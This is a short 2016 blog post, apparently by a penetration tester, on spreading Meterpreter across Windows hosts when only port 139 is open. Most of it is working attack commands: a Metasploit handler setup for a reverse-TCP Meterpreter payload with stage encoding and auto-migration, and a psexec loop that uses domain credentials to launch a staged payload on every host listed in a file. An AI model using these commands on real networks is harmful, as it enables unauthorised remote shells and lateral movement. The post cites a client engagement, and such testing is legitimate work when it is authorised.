Monday, June 20, 2016

Meterpreter over TCP/139

My Client has closed all but port 139 of the netbios ports, preventing me from using Metaplsoit’s PSEXEC. But, Mark Russinovich’s version from Microsoft will work just as well, albeit a hell of a lot slower.

Prep your loader following the instructions at

Nmap all the 139 open ports and drop them into a file. Set up your handler. I use this with good success:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4455
set EnableStageEncoding true
set AutoRunScript post/windows/manage/migrate
exploit -j –z

Download the original PSEXEC from Microsoft and run the following Windows script one-liner:

FOR /F %A IN (139.txt) DO psexec -s -u DOMAIN\user -p PASSWORD \\%A \\\Share\stage.exe 

If you want to use this in a batch file, double up on the % for the variables, like FOR /F %%A IN… 

No comments:

Post a Comment

Thanks for adding to the conversation. I'll update your post shortly.